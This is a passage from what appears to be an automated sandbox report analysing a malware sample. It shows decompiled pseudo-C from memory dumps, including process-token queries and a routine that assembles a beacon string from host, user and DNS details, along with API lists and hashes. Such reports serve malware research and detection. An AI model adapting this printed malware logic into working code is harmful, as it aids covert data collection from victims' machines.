                                                          • Instruction Fuzzy Hash: 04F03071F9131397DF106F3EEA48E163B99EB08BE5B040A61F808D7290EB30C450A660
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E02B96702() {
                                                          				void* _v0;
                                                          				void** _t3;
                                                          				void** _t5;
                                                          				void** _t7;
                                                          				void** _t8;
                                                          				void* _t10;
                                                          
                                                          				_t3 =  *0x2b9d32c; // 0x69b95b0
                                                          				__imp__( &(_t3[0x10]));
                                                          				while(1) {
                                                          					_t5 =  *0x2b9d32c; // 0x69b95b0
                                                          					_t1 =  &(_t5[0x16]); // 0x0
                                                          					if( *_t1 == 0) {
                                                          						break;
                                                          					}
                                                          					Sleep(0xa);
                                                          				}
                                                          				_t7 =  *0x2b9d32c; // 0x69b95b0
                                                          				_t10 =  *_t7;
                                                          				if(_t10 != 0 && _t10 != 0x2b9e81a) {
                                                          					HeapFree( *0x2b9d238, 0, _t10);
                                                          					_t7 =  *0x2b9d32c; // 0x69b95b0
                                                          				}
                                                          				 *_t7 = _v0;
                                                          				_t8 =  &(_t7[0x10]);
                                                          				__imp__(_t8);
                                                          				return _t8;
                                                          			}










                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(069B9570), ref: 02B9670B
                                                          • Sleep.KERNEL32(0000000A,?,02B95D25), ref: 02B96715
                                                          • HeapFree.KERNEL32(00000000,?,?,02B95D25), ref: 02B96743
                                                          • RtlLeaveCriticalSection.NTDLL(069B9570), ref: 02B96758
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 6f43467e877b899e6b005e8d820df8180442915e69d15a13583abb65bea9aa26
                                                          • Instruction ID: 2262b9cc6d8cf1017829ba97cb650ee8f0306c949c9ac73562ef449c8cc7771d
                                                          • Opcode Fuzzy Hash: 6f43467e877b899e6b005e8d820df8180442915e69d15a13583abb65bea9aa26
                                                          • Instruction Fuzzy Hash: 62F0F874E841019FEB18DF75DA99F157BE9EB08781B45C86AFA02C7360C735E820CE24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E02B95AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                          				intOrPtr* _v8;
                                                          				void* _t17;
                                                          				intOrPtr* _t22;
                                                          				void* _t27;
                                                          				char* _t30;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t37;
                                                          				void* _t39;
                                                          				int _t42;
                                                          
                                                          				_t17 = __eax;
                                                          				_t37 = 0;
                                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                          				_t2 = _t17 + 1; // 0x1
                                                          				_t28 = _t2;
                                                          				_t34 = E02B9A71F(_t2);
                                                          				if(_t34 != 0) {
                                                          					_t30 = E02B9A71F(_t28);
                                                          					if(_t30 == 0) {
                                                          						E02B9A734(_t34);
                                                          					} else {
                                                          						_t39 = _a4;
                                                          						_t22 = E02B9A782(_t39);
                                                          						_v8 = _t22;
                                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                          							_a4 = _t39;
                                                          						} else {
                                                          							_t26 = _t22 + 2;
                                                          							_a4 = _t22 + 2;
                                                          							_t22 = E02B9A782(_t26);
                                                          							_v8 = _t22;
                                                          						}
                                                          						if(_t22 == 0) {
                                                          							__imp__(_t34, _a4);
                                                          							 *_t30 = 0x2f;
                                                          							 *((char*)(_t30 + 1)) = 0;
                                                          						} else {
                                                          							_t42 = _t22 - _a4;
                                                          							memcpy(_t34, _a4, _t42);
                                                          							 *((char*)(_t34 + _t42)) = 0;
                                                          							__imp__(_t30, _v8);
                                                          						}
                                                          						 *_a8 = _t34;
                                                          						_t37 = 1;
                                                          						 *_a12 = _t30;
                                                          					}
                                                          				}
                                                          				return _t37;
                                                          			}

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?,?,00000000), ref: 02B95AFD
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                            • Part of subcall function 02B9A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02B95B2B,00000000,00000001,00000001,?,?,02B93E08,?,?,?,?,00000102), ref: 02B9A790
                                                            • Part of subcall function 02B9A782: StrChrA.SHLWAPI(?,0000003F,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?,?,00000000,00000000), ref: 02B9A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02B93E08,?,?,?,?,00000102,02B967B8,?), ref: 02B95B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 02B95B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 02B95B77
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 5621bd8d45aa7d05b55bf569b43ecd6fac11d1c675b5182bb456bd9bc3bfb213
                                                          • Instruction ID: 89ca006f6cd84ddd98d48d74c4874e7776bf3e4568e5ae460bfd321ae1084f8f
                                                          • Opcode Fuzzy Hash: 5621bd8d45aa7d05b55bf569b43ecd6fac11d1c675b5182bb456bd9bc3bfb213
                                                          • Instruction Fuzzy Hash: 5921A2B6504215EBCF226F74CC94A9ABFBAEF06394F5480A5F9059F211D735D910CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E02B945C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                          				void* _v8;
                                                          				void* _t18;
                                                          				int _t25;
                                                          				int _t29;
                                                          				int _t34;
                                                          
                                                          				_t29 = lstrlenW(_a4);
                                                          				_t25 = lstrlenW(_a8);
                                                          				_t18 = E02B9A71F(_t25 + _t29 + _t25 + _t29 + 2);
                                                          				_v8 = _t18;
                                                          				if(_t18 != 0) {
                                                          					_t34 = _t29 + _t29;
                                                          					memcpy(_t18, _a4, _t34);
                                                          					_t10 = _t25 + 2; // 0x2
                                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                          				}
                                                          				return _v8;
                                                          			}

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,069B935C,?,02B98D93,004F0053,069B935C,?,?,?,?,?,?,02B9523E), ref: 02B945D6
                                                          • lstrlenW.KERNEL32(02B98D93,?,02B98D93,004F0053,069B935C,?,?,?,?,?,?,02B9523E), ref: 02B945DD
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,02B98D93,004F0053,069B935C,?,?,?,?,?,?,02B9523E), ref: 02B945FD
                                                          • memcpy.NTDLL(74B069A0,02B98D93,00000002,00000000,004F0053,74B069A0,?,?,02B98D93,004F0053,069B935C), ref: 02B94610
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: eebb0ff949574f479b225e3240b31e3499aa1b8b16c89c07259a8372e86a5cb4
                                                          • Instruction ID: efcea46a3224e379983bc8d781a0ef7fe48d2046af273cc9b9cf8d7eee0c283b
                                                          • Opcode Fuzzy Hash: eebb0ff949574f479b225e3240b31e3499aa1b8b16c89c07259a8372e86a5cb4
                                                          • Instruction Fuzzy Hash: 9EF0F976900119BBCF11EFA9CC85C9F7BADEF0929471584A2EA04D7201E735EA159BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(069B9A78,00000000,00000000,7742C740,02B920ED,00000000), ref: 02B9362A
                                                          • lstrlen.KERNEL32(?), ref: 02B93632
                                                            • Part of subcall function 02B9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02B95595), ref: 02B9A72B
                                                          • lstrcpy.KERNEL32(00000000,069B9A78), ref: 02B93646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 02B93651
                                                          Memory Dump Source
                                                          • Source File: 00000023.00000002.390282445.0000000002B91000.00000020.00000001.sdmp, Offset: 02B90000, based on PE: true
                                                          • Associated: 00000023.00000002.390249117.0000000002B90000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390318241.0000000002B9C000.00000002.00000001.sdmp
                                                          • Associated: 00000023.00000002.390350228.0000000002B9D000.00000004.00000001.sdmp
                                                          • Associated: 00000023.00000002.390398092.0000000002B9F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: 395717869101265d1052a27e77e787bcb526ba35c3dd1e6fc77cd5e21d3a34c9
                                                          • Instruction ID: f8494e84cebb22165361a95784a105d9ab6997c05e6b42f9f1e186d40c6a9e81
                                                          • Opcode Fuzzy Hash: 395717869101265d1052a27e77e787bcb526ba35c3dd1e6fc77cd5e21d3a34c9
                                                          • Instruction Fuzzy Hash: 87E01273901621678B11ABE5AD48C5BBFADEF8D691B040867F600D3110C72598258BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 38%
                                                          			E04955A27(char _a4, void* _a8) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v40;
                                                          				void* _v44;
                                                          				void** _t33;
                                                          				void* _t40;
                                                          				void* _t43;
                                                          				void** _t44;
                                                          				intOrPtr* _t47;
                                                          				char _t48;
                                                          
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v20 = _a4;
                                                          				_t48 = 0;
                                                          				_v16 = 0;
                                                          				_a4 = 0;
                                                          				_v44 = 0x18;
                                                          				_v40 = 0;
                                                          				_v32 = 0;
                                                          				_v36 = 0;
                                                          				_v28 = 0;
                                                          				_v24 = 0;
                                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                          					_t33 =  &_v8;
                                                          					__imp__(_v12, 8, _t33);
                                                          					if(_t33 >= 0) {
                                                          						_t47 = __imp__;
                                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                          						_t44 = E0495A71F(_a4);
                                                          						if(_t44 != 0) {
                                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                          							if(_t40 >= 0) {
                                                          								memcpy(_a8,  *_t44, 0x1c);
                                                          								_t48 = 1;
                                                          							}
                                                          							E0495A734(_t44);
                                                          						}
                                                          						NtClose(_v8); // executed
                                                          					}
                                                          					NtClose(_v12);
                                                          				}
                                                          				return _t48;
                                                          			}

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04955A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04955A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04955A9D
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04955ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04955AC7
                                                          • NtClose.NTDLL(?), ref: 04955AD9
                                                          • NtClose.NTDLL(00000000), ref: 04955AE3
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: 15d10dc9412f208981304d447b95b380e1359a6109971eccbce8539563a6459b
                                                          • Instruction ID: 34f37ce23d9e35990191a50cd072d23328f6153c78824c12f7db114543b2ec14
                                                          • Opcode Fuzzy Hash: 15d10dc9412f208981304d447b95b380e1359a6109971eccbce8539563a6459b
                                                          • Instruction Fuzzy Hash: 7321E971900218BBDF01DFA5CC85ADEBFBDEF48750F208126F905E6120D775AA449BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E04954AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                          				void* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				void* _v20;
                                                          				void* _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				long _t59;
                                                          				intOrPtr _t60;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t63;
                                                          				intOrPtr _t64;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				int _t71;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t78;
                                                          				intOrPtr _t82;
                                                          				intOrPtr _t86;
                                                          				intOrPtr* _t88;
                                                          				void* _t94;
                                                          				intOrPtr _t100;
                                                          				signed int _t104;
                                                          				char** _t106;
                                                          				int _t109;
                                                          				signed int _t111;
                                                          				intOrPtr* _t112;
                                                          				intOrPtr* _t114;
                                                          				intOrPtr* _t116;
                                                          				intOrPtr* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t126;
                                                          				int _t130;
                                                          				CHAR* _t132;
                                                          				intOrPtr _t133;
                                                          				void* _t134;
                                                          				void* _t143;
                                                          				int _t144;
                                                          				void* _t145;
                                                          				intOrPtr _t146;
                                                          				void* _t148;
                                                          				long _t152;
                                                          				intOrPtr* _t153;
                                                          				intOrPtr* _t154;
                                                          				intOrPtr* _t157;
                                                          				void* _t158;
                                                          				void* _t160;
                                                          
                                                          				_t143 = __edx;
                                                          				_t134 = __ecx;
                                                          				_t59 = __eax;
                                                          				_v12 = 8;
                                                          				if(__eax == 0) {
                                                          					_t59 = GetTickCount();
                                                          				}
                                                          				_t60 =  *0x495d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t61 =  *0x495d014; // 0x3a87c8cd
                                                          				_t132 = _a16;
                                                          				asm("bswap eax");
                                                          				_t62 =  *0x495d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t63 = E0495D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t64 =  *0x495d2a8; // 0x47a5a8
                                                          				_t3 = _t64 + 0x495e633; // 0x74666f73
                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x495d02c,  *0x495d004, _t59);
                                                          				_t67 = E049556CD();
                                                          				_t68 =  *0x495d2a8; // 0x47a5a8
                                                          				_t4 = _t68 + 0x495e673; // 0x74707526
                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                          				_t160 = _t158 + 0x38;
                                                          				_t145 = _t144 + _t71; // executed
                                                          				_t72 = E049558DB(_t134); // executed
                                                          				_t133 = __imp__;
                                                          				_v8 = _t72;
                                                          				if(_t72 != 0) {
                                                          					_t126 =  *0x495d2a8; // 0x47a5a8
                                                          					_t7 = _t126 + 0x495e8d4; // 0x736e6426
                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                          					_t160 = _t160 + 0xc;
                                                          					_t145 = _t145 + _t130;
                                                          					HeapFree( *0x495d238, 0, _v8);
                                                          				}
                                                          				_t73 = E0495A199();
                                                          				_v8 = _t73;
                                                          				if(_t73 != 0) {
                                                          					_t121 =  *0x495d2a8; // 0x47a5a8
                                                          					_t11 = _t121 + 0x495e8dc; // 0x6f687726
                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                          					_t160 = _t160 + 0xc;
                                                          					HeapFree( *0x495d238, 0, _v8);
                                                          				}
                                                          				_t146 =  *0x495d32c; // 0x4dd95b0
                                                          				_t75 = E04954622(0x495d00a, _t146 + 4);
                                                          				_t152 = 0;
                                                          				_v20 = _t75;
                                                          				if(_t75 == 0) {
                                                          					L26:
                                                          					RtlFreeHeap( *0x495d238, _t152, _a16); // executed
                                                          					return _v12;
                                                          				} else {
                                                          					_t78 = RtlAllocateHeap( *0x495d238, 0, 0x800);
                                                          					_v8 = _t78;
                                                          					if(_t78 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x495d238, _t152, _v20);
                                                          						goto L26;
                                                          					}
                                                          					E0495518F(GetTickCount());
                                                          					_t82 =  *0x495d32c; // 0x4dd95b0
                                                          					__imp__(_t82 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t86 =  *0x495d32c; // 0x4dd95b0
                                                          					__imp__(_t86 + 0x40);
                                                          					_t88 =  *0x495d32c; // 0x4dd95b0
                                                          					_t148 = E04951BB6(1, _t143, _a16,  *_t88);
                                                          					_v28 = _t148;
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t148 == 0) {
                                                          						L24:
                                                          						HeapFree( *0x495d238, _t152, _v8);
                                                          						goto L25;
                                                          					}
                                                          					StrTrimA(_t148, 0x495c28c);
                                                          					_push(_t148);
                                                          					_t94 = E0495361A();
                                                          					_v16 = _t94;
                                                          					if(_t94 == 0) {
                                                          						L23:
                                                          						HeapFree( *0x495d238, _t152, _t148);
                                                          						goto L24;
                                                          					}
                                                          					_t153 = __imp__;
                                                          					 *_t153(_t148, _a4);
                                                          					 *_t153(_v8, _v20);
                                                          					_t154 = __imp__;
                                                          					 *_t154(_v8, _v16);
                                                          					_t100 = E04959070( *_t154(_v8, _t148), _v8);
                                                          					_a4 = _t100;
                                                          					if(_t100 == 0) {
                                                          						_v12 = 8;
                                                          						L21:
                                                          						E04956761();
                                                          						L22:
                                                          						HeapFree( *0x495d238, 0, _v16);
                                                          						_t152 = 0;
                                                          						goto L23;
                                                          					}
                                                          					_t104 = E049569B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
                                                          					_v12 = _t104;
                                                          					if(_t104 == 0) {
                                                          						_t157 = _v24;
                                                          						_t111 = E0495391F(_t157, _a4, _a8, _a12); // executed
                                                          						_v12 = _t111;
                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                          						_t118 =  *_t157;
                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                          						E0495A734(_t157);
                                                          					}
                                                          					if(_v12 != 0x10d2) {
                                                          						L16:
                                                          						if(_v12 == 0) {
                                                          							_t106 = _a8;
                                                          							if(_t106 != 0) {
                                                          								_t149 =  *_t106;
                                                          								_t155 =  *_a12;
                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                          								_t109 = E04955800(_t149, _t149, _t155 >> 1);
                                                          								_t148 = _v28;
                                                          								 *_a12 = _t109;
                                                          							}
                                                          						}
                                                          						goto L19;
                                                          					} else {
                                                          						if(_a8 != 0) {
                                                          							L19:
                                                          							E0495A734(_a4);
                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                          								goto L22;
                                                          							} else {
                                                          								goto L21;
                                                          							}
                                                          						}
                                                          						_v12 = _v12 & 0x00000000;
                                                          						goto L16;
                                                          					}
                                                          				}
                                                           			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04954ACA
                                                          • wsprintfA.USER32 ref: 04954B1A
                                                          • wsprintfA.USER32 ref: 04954B37
                                                          • wsprintfA.USER32 ref: 04954B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04954B75
                                                          • wsprintfA.USER32 ref: 04954B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04954BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04954BD4
                                                          • GetTickCount.KERNEL32 ref: 04954BE5
                                                          • RtlEnterCriticalSection.NTDLL(04DD9570), ref: 04954BF9
                                                          • RtlLeaveCriticalSection.NTDLL(04DD9570), ref: 04954C17
                                                            • Part of subcall function 04951BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,049520C2,?,04DD95B0), ref: 04951BE1
                                                            • Part of subcall function 04951BB6: lstrlen.KERNEL32(?,?,?,049520C2,?,04DD95B0), ref: 04951BE9
                                                            • Part of subcall function 04951BB6: strcpy.NTDLL ref: 04951C00
                                                            • Part of subcall function 04951BB6: lstrcat.KERNEL32(00000000,?), ref: 04951C0B
                                                            • Part of subcall function 04951BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049520C2,?,04DD95B0), ref: 04951C28
                                                          • StrTrimA.SHLWAPI(00000000,0495C28C,?,04DD95B0), ref: 04954C4E
                                                            • Part of subcall function 0495361A: lstrlen.KERNEL32(04DD9A78,00000000,00000000,7742C740,049520ED,00000000), ref: 0495362A
                                                            • Part of subcall function 0495361A: lstrlen.KERNEL32(?), ref: 04953632
                                                            • Part of subcall function 0495361A: lstrcpy.KERNEL32(00000000,04DD9A78), ref: 04953646
                                                            • Part of subcall function 0495361A: lstrcat.KERNEL32(00000000,?), ref: 04953651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04954C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04954C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04954C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04954C8B
                                                            • Part of subcall function 04959070: lstrlen.KERNEL32(?,00000000,04DD9A98,00000000,04958808,04DD9C76,?,?,?,?,?,63699BC3,00000005,0495D00C), ref: 04959077
                                                            • Part of subcall function 04959070: mbstowcs.NTDLL ref: 049590A0
                                                            • Part of subcall function 04959070: memset.NTDLL ref: 049590B2
                                                          • wcstombs.NTDLL ref: 04954D1C
                                                            • Part of subcall function 0495391F: SysAllocString.OLEAUT32(?), ref: 0495395A
                                                            • Part of subcall function 0495391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 049539DD
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04954D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04954D69
                                                          • HeapFree.KERNEL32(00000000,?,?,04DD95B0), ref: 04954D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04954D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04954D8D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                           • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                           • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                           • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                           • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: 5fc3702f1e04b32eefc4952a312048494a513da78c1aebae565192c6ea585129
                                                          • Instruction ID: 32613fe97c7a3f7d59ab0120f5317d6b1fb044836181d6eac1f61702f6c69a8d
                                                          • Opcode Fuzzy Hash: 5fc3702f1e04b32eefc4952a312048494a513da78c1aebae565192c6ea585129
                                                          • Instruction Fuzzy Hash: 41913871900208AFDB11EFA4EC48AAE7FB9EF49354F248134E904E7220D739ED51DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E0495AC55(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				struct HINSTANCE__* _t99;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x4950000;
                                                          				_t115 = _t139[3] + 0x4950000;
                                                          				_t131 = _t139[4] + 0x4950000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x4950000;
                                                          				_v16 = _t139[5] + 0x4950000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x4950002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x495d1a0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x495d1a0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x495d1a0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x495d19c; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
